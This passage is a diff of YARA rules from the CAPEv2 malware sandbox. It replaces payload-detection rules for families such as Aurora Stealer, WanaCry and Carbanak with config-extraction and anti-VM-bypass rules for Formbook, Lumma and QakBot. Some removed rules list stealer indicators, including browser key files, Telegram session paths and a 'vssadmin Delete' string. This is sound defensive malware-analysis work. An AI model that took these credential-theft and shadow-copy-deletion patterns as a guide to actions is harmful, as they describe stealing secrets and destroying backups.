-		author = "enzok"
-		id = "45628576-3fbf-593d-a113-0bbfb12bd808"
-		date = "2024-12-02"
-		modified = "2024-12-02"
+		description = "Formbook Config Extraction"
+		author = "kevoreilly"
+		id = "a91cd10e-c043-556a-819b-c57bfc308260"
+		date = "2025-06-13"
+		modified = "2025-06-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/NitrogenLoader.yar#L1-L23"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "24117d6e04bc964c17c08c9918502410890d7ccdc2e9971f2d01f6f0b41d3836"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Formbook.yar#L60-L75"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "bb8f54220394420e698b5eac9276c3d0ab03148808cfb9e98feb56437ce2a5a7"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "NitrogenLoader Loader"
-		hash1 = "7b603d63a23201ff0b6ffa9acdd650df9caa1731837d559d93b3d8ce1d82a962"
-		hash2 = "50c2afd792bfe2966133ee385054eaae1f73b04e013ef3434ef2407f99d7f037"
+		cape_options = "clear,bp0=$c2_1,bp0=$c2_2,action0=string:rcx,bp1=$decoy,action1=string:rdi,bp2=$config,action2=scan,bp3=$sleep+5,action3=skip,count=0,typestring=Formbook Config"
+		packed = "60571b2683e7b753a77029ebe9b5e1cb9f3fbfa8d6a43e4b7239eefd13141ae4"
 
 	strings:
-		$stringaes1 = {63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76 ca 82 c9 7d fa}
-		$stringaes2 = {52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c e3 39 82 9b}
-		$string1 = "BASS_GetEAXParameters"
-		$string2 = "LoadResource"
-		$syscallmakehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
-		$syscallnumber = {49 89 C3 B? [4] E8 [3] 00}
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
-		$decryptstr1 = {33 D2 48 8B 04 24 B? 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
-		$decryptstr2 = {0F BE C0 48 8B 0C 24 48 8B 54 24 ?? 48 03 D1 48 8B CA 0F BE 09 33 C8 8B C1 48 8B 0C 24 48 8B 54 24 ?? 48 03 D1}
-		$decryptrsc1 = {48 8B 8C 24 [4] 0F B6 04 01 89 ?? 24 [1-4] 48 63 4C 24 ?? 33 D2 48 8B C1 48 F7 B4 24 [4] 48 8B C2 48 8B 8C}
-		$decryptrsc2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$c2_1 = {44 0F B6 5D ?? 45 84 DB 74 ?? 48 8D 4D [1-5] 41 80 FB 2F 74 11 0F B6 41 01 48 FF C1 FF C3 44 0F B6 D8 84 C0 75}
+		$c2_2 = {40 53 48 83 EC 20 48 8B DA 48 85 C9 74 28 80 39 00 74 23 48 85 D2 74 1E 48 8B D1 41 B8 04 00 00 00 48 8B CB E8}
+		$decoy = {45 3B B5 [2] 00 00 [0-7] 44 8D 1C 33 48 8D 7D [1-5] 42 C6 44 [2] 00 [0-4] 48 8B CF E8}
+		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 F6 33 C0 4C 8B E9 4C 89 75}
+		$sleep = {B9 88 13 00 00 FF D7 44 8B 9B [4] 41 81 FB 00 01 00 00 75 ?? 48 39 B3 [4] 74 ?? 8B 83 [4] 05 00 20 00 00 39 B0}
 
 	condition:
-		( all of ( $string* ) or all of ( $decrypt* ) ) and any of ( $syscall* )
+		2 of them
 }
-rule CAPE_Aurorastealer : FILE
+rule CAPE_Lumma_1 : FILE
 {
 	meta:
-		description = "detects Aurora Stealer samples"
-		author = "Johannes Bader @viql"
-		id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7"
-		date = "2022-12-14"
-		modified = "2023-03-31"
+		description = "Lumma config extraction"
+		author = "kevoreilly"
+		id = "b2166620-3070-5727-b189-e6959cc5b698"
+		date = "2024-05-09"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AuroraStealer.yar#L1-L74"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Lumma.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a8f9212b619796f91f14c4164e4d2f30c66b51118f22f3d6c310841b6707b7b0"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = "FILE"
-		version = "v1.0"
-		tlp = "TLP:WHITE"
-		malpedia_family = "win.aurora_stealer"
-		hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8"
-		hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4"
-		hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d"
-		hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689"
-		hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783"
-		hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b"
-		cape_type = "AuroraStealer Payload"
+		cape_options = "bp0=$decode+5,action0=string:ebp,count=0,bp1=$patch+8,action1=skip,typestring=Lumma Config"
+		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
 
 	strings:
-		$str_func_01 = "main.(*DATA_BLOB).ToByteArray"
-		$str_func_02 = "main.Base64Encode"
-		$str_func_03 = "main.Capture"
-		$str_func_04 = "main.CaptureRect"
-		$str_func_05 = "main.ConnectToServer"
-		$str_func_06 = "main.CreateImage"
-		$str_func_07 = "main.FileExsist"
-		$str_func_08 = "main.GetDisplayBounds"
-		$str_func_09 = "main.GetInfoUser"
-		$str_func_10 = "main.GetOS"
-		$str_func_11 = "main.Grab"
-		$str_func_12 = "main.MachineID"
-		$str_func_13 = "main.NewBlob"
-		$str_func_14 = "main.NumActiveDisplays"
-		$str_func_15 = "main.PathTrans"
-		$str_func_16 = "main.SendToServer_NEW"
-		$str_func_17 = "main.SetUsermame"
-		$str_func_18 = "main.Zip"
-		$str_func_19 = "main.base64Decode"
-		$str_func_20 = "main.countupMonitorCallback"
-		$str_func_21 = "main.enumDisplayMonitors"
-		$str_func_22 = "main.getCPU"
-		$str_func_23 = "main.getDesktopWindow"
-		$str_func_24 = "main.getGPU"
-		$str_func_25 = "main.getMasterKey"
-		$str_func_26 = "main.getMonitorBoundsCallback"
-		$str_func_27 = "main.getMonitorRealSize"
-		$str_func_28 = "main.sysTotalMemory"
-		$str_func_29 = "main.xDecrypt"
-		$str_type_01 = "type..eq.main.Browser_G"
-		$str_type_02 = "type..eq.main.STRUSER"
-		$str_type_03 = "type..eq.main.Telegram_G"
-		$str_type_04 = "type..eq.main.Crypto_G"
-		$str_type_05 = "type..eq.main.ScreenShot_G"
-		$str_type_06 = "type..eq.main.FileGrabber_G"
-		$str_type_07 = "type..eq.main.FTP_G"
-		$str_type_08 = "type..eq.main.Steam_G"
-		$str_type_09 = "type..eq.main.DATA_BLOB"
-		$str_type_10 = "type..eq.main.Grabber"
-		$varia_01 = "\\User Data\\Local State"
-		$varia_02 = "\\\\Opera Stable\\\\Local State"
-		$varia_03 = "Reconnect 1"
-		$varia_04 = "@ftmone"
-		$varia_05 = "^user^"
-		$varia_06 = "wmic path win32_VideoController get name"
-		$varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata"
-		$varia_08 = "C:\\Windows.old\\Users\\"
-		$varia_09 = "ScreenShot"
-		$varia_10 = "Crypto"
+		$c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF}
+		$decode = {C6 44 05 00 00 83 C4 2C 5E 5F 5B 5D C3}
+		$patch = {66 C7 0? 00 00 8B 46 1? C6 00 01 8B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 32 of ( $str_* ) or 9 of ( $varia_* ) )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule CAPE_Kronos : FILE
+rule CAPE_Lummaremap
 {
 	meta:
-		description = "Kronos Payload"
+		description = "Lumma ntdll-remap bypass"
 		author = "kevoreilly"
-		id = "921a939b-a037-5973-bd8e-f9f55fce7f0f"
-		date = "2020-07-02"
-		modified = "2020-07-02"
+		id = "93ae37d1-a38a-5f96-8bb3-cc648a49b588"
+		date = "2024-05-09"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Kronos.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "52ce9caf3627efe8ae86df6ca59e51e9f738e13ac0265f797e8d70123dbcaeb3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Lumma.yar#L16-L27"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "51093379fbd041f75bdfe161bc9dfcc7d782c23ce16d625ca558bb58d8d57713"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Kronos Payload"
+		tags = ""
+		cape_options = "ntdll-remap=0"
+		packed = "7972cbf2c143cea3f90f4d8a9ed3d39ac13980adfdcf8ff766b574e2bbcef1b4"
 
 	strings:
-		$a1 = "user_pref(\"network.cookie.cookieBehavior\""
-		$a2 = "T0E0H4U0X3A3D4D8"
-		$a3 = "wow64cpu.dll" wide
-		$a4 = "Kronos" fullword ascii wide
+		$remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of ( $a* ) )
+		any of them
 }
-rule CAPE_Carbanak : FILE
+rule CAPE_Slowloader
 {
 	meta:
-		description = "Carnbanak Payload"
-		author = "enzok"
-		id = "e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1"
-		date = "2024-03-18"
-		modified = "2024-03-18"
+		description = "SlowLoader detonation aide for slow cpus (thread race)"
+		author = "kevoreilly"
+		id = "05724bf4-b767-542d-a2dd-a9ae3e5ea5cc"
+		date = "2024-09-23"
+		modified = "2024-09-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Carbanak.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84"
-		logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/SlowLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "f07528c646ebd980a5e843caa4a4715e31b22c3cd091576600e9fe45d7fc2fe4"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Carbanak Payload"
+		tags = ""
+		cape_options = "break-on-return=CreateProcessA,action0=sleep:1000,count=0"
+		packed = "f6eeb73ffb3e6d6cc48f74344cb590614db7e3116ba00a52aefd7dff468a60a5"
 
 	strings:
-		$sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06}
-		$decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81}
-		$constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D}
+		$code = {0F B6 44 07 08 0F B6 54 1F 08 03 C2 25 FF 00 00 80 79 07 48 0D 00 FF FF FF 40 89 45 ?? 6A 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		any of them
 }
-rule CAPE_Zerot : FILE
+rule CAPE_Anticuckoo : FILE
 {
 	meta:
-		description = "ZeroT Payload"
+		description = "AntiCuckoo bypass: https://github.com/therealdreg/anticuckoo"
 		author = "kevoreilly"
-		id = "dc5dc18c-2ec6-541d-905c-42543f17b16d"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "e221e57b-313e-5998-a3fc-5b4e9671b989"
+		date = "2023-03-17"
+		modified = "2023-03-17"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/ZeroT.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/AntiCuckoo.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "ad5e52f144bb4a1dae3090978c6ecb4c7732538c9b62a6cedd32eccee6094be5"
+		logic_hash = "a039aeca2dae44980e8bffafacfda90975e107001be50f11ac916b35ad43592e"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "FILE"
-		cape_type = "ZeroT Payload"
+		cape_options = "bp0=$HKActivOldStackCrash+36,action0=jmp,count=1"
 
 	strings:
-		$decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0}
-		$string1 = "(*^GF(9042&*"
-		$string2 = "s2-18rg1-41g3j_.;"
-		$string3 = "GET" wide
-		$string4 = "open"
+		$HKActivOldStackCrash = {5B 81 FB FA FA FA FA 74 01 41 3B E0 75 ?? 83 E9 0B 83 F9 04 7F 04 C6 45 ?? 00 89 4D ?? 89 65 ?? 80 7D ?? 00 74}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Wanacry : FILE
+rule CAPE_Rhadamanthys_1
 {
 	meta:
-		description = "WanaCry Payload"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "a6525e0f-fccd-5542-9be8-e42d708fe502"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "d9d387e1-76b3-55f6-a40f-a8c9cb9e9bea"
+		date = "2023-04-18"
+		modified = "2023-04-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/WanaCry.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Rhadamanthys.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "3c8fbfe14f81e099fc900023d9c856e3f45b99af38889ed952b2ac67a636f51d"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "WanaCry Payload"
+		tags = ""
+		cape_options = "bp0=$conf-11,hc0=1,action0=setdump:edx::ebx,bp1=$conf+64,hc1=1,action1=dump,count=0,typestring=Rhadamanthys Config,ntdll-protect=0"
+		packed = "9e28586ab70b1abdccfe087d81e326a0703f75e9551ced187d37c51130ad02f5"
 
 	strings:
-		$exename = "@WanaDecryptor@.exe"
-		$res = "%08X.res"
-		$pky = "%08X.pky"
-		$eky = "%08X.eky"
-		$taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53}
+		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
+		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
+		$conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		2 of them
 }
-rule CAPE_Buerloader_1 : FILE
+rule CAPE_Qakbot5_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly & Rony (@r0ny_123)"
-		id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4"
-		date = "2022-05-31"
-		modified = "2022-05-31"
+		description = "QakBot WMI anti-anti-vm"
+		author = "kevoreilly"
+		id = "d287b043-15df-5865-ad4c-9eb64ceec04c"
+		date = "2024-02-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BuerLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/QakBot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "303ea2d8d1a7f0fd0ca5508dae2c1b83c03b1e3e975760f15d36d93bcc152767"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "BuerLoader Payload"
+		cape_options = "bp0=$loop+35,action0=skip,count=0"
+		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
 
 	strings:
-		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
-		$decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00}
-		$op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02}
+		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
+		$conf = {0F B7 1D [4] B9 [2] 00 00 E8 [4] 8B D3 48 89 45 ?? 45 33 C9 48 8D 0D [4] 4C 8B C0 48 8B F8 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Hermes : FILE
+rule CAPE_Qakbot4_1 : FILE
 {
 	meta:
-		description = "Hermes Payload"
+		description = "QakBot Config Extraction"
 		author = "kevoreilly"
-		id = "0ff44422-9c14-517b-9e71-8e9e19694f06"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "401184cf-bbd7-5afe-9589-470f54721af1"
+		date = "2024-02-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Hermes.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "9bc974173f39a57e7adfbf8ae106a20d960557696b4c3ce16e9b4e47d3e9e95b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/QakBot.yar#L15-L29"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "ad75b07b9b786f634fd46cbe6dc089d3f732673320e70714e8ab058f0392c9f5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Hermes Payload"
+		cape_options = "bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config"
+		packed = "f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68"
 
 	strings:
-		$ext = ".HRM" wide
-		$vss = "vssadmin Delete"
-		$email = "supportdecrypt@firemail.cc" wide
+		$params = {8B 7D ?? 8B F1 57 89 55 ?? E8 [4] 8D 9E [2] 00 00 89 03 59 85 C0 75 08 6A FC 58 E9}
+		$c2list1 = {59 59 8D 4D D8 89 45 E0 E8 [4] 8B 45 E0 85 C0 74 ?? 8B 90 [2] 00 00 51 8B 88 [2] 00 00 6A 00 E8}
+		$c2list2 = {59 59 8B F8 8D 4D ?? 89 7D ?? E8 [4] 85 FF 74 52 8B 97 [2] 00 00 51 8B 8F [2] 00 00 53 E8}
+		$conf = {5F 5E 5B C9 C3 51 6A 00 E8 [4] 59 59 85 C0 75 01 C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $* )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Magniber : FILE
+rule CAPE_Qakbotloader : FILE
 {
 	meta:
-		description = "Magniber Payload"
+		description = "QakBot Export Selection"
 		author = "kevoreilly"
-		id = "a704914f-2aa2-537d-975d-f8c23427951f"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "b2d5ef1c-0651-5249-9c4b-7e83235d4a30"
+		date = "2024-02-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Magniber.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/QakBot.yar#L31-L46"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
+		logic_hash = "00869c0a9bf62cde3f46ca915b0ef689557b09dc58d6de34609e3998abfa7e98"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Magniber Payload"
+		cape_options = "export=$export1,export=$export2,export=$export3"
 
 	strings:
-		$a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16}
+		$export1 = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
+		$export2 = {55 8B EC 3A ?? 74 [8-16] 74 [6-16] EB}
+		$export3 = {55 8B EC 66 3B ?? 74 [3-5] 74}
+		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E? [5-20] 74}
+		$getteb = {EB 00 55 8B EC 66 3B E4 74 ?? [1-5] 64 A1 18 00 00 00 5D EB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and ( any of ( $export* ) ) and ( $wind or $getteb )
 }
-rule CAPE_Bruteratel
+rule CAPE_Qakbotantivm
 {
 	meta:
-		description = "BruteRatel Payload"
+		description = "QakBot AntiVM bypass"
 		author = "kevoreilly"
-		id = "61b951e4-0c27-59c0-8ea2-715b673fdcee"
-		date = "2024-07-11"
-		modified = "2024-07-11"
+		id = "7446522a-788a-512d-ad68-2fcc56169f5a"
+		date = "2024-02-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BruteRatel.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/QakBot.yar#L48-L59"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "e269497ce458b21c8427b3f6f6594a25d583490930af2d3395cb013b20d08ff7"
+		logic_hash = "20f1cd28f38945a3aa328e77e78525fb1ffc47ecf54d5a40c2f18264c3973989"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "BruteRatel Payload"
+		cape_options = "bp0=$antivm1,action0=unwind,count=1"
 
 	strings:
-		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
-		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
-		$jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2}
-		$decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB}
+		$antivm1 = {55 8B EC 3A E4 0F [2] 00 00 00 6A 04 58 3A E4 0F [2] 00 00 00 C7 44 01 [5] 81 44 01 [5] 66 3B FF 74 ?? 6A 04 58 66 3B ED 0F [2] 00 00 00 C7 44 01 [5] 81 6C 01 [5] EB}
 
 	condition:
-		2 of them
+		all of them
 }
-rule CAPE_Scarab : FILE
+rule CAPE_Buerloader_1 : FILE
 {
 	meta:
-		description = "Scarab Payload"
+		description = "BuerLoader RDTSC Trap Bypass"
 		author = "kevoreilly"
-		id = "2ba8ae50-1e56-5773-aaea-058161b59c78"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "38f01199-6bd2-5519-b570-8c0f46e74286"
+		date = "2021-03-13"
+		modified = "2021-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Scarab.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BuerLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6f9f9b4c01251c0643c61701084cca2bdfeea08ca95f982355565cf05483d940"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Scarab Payload"
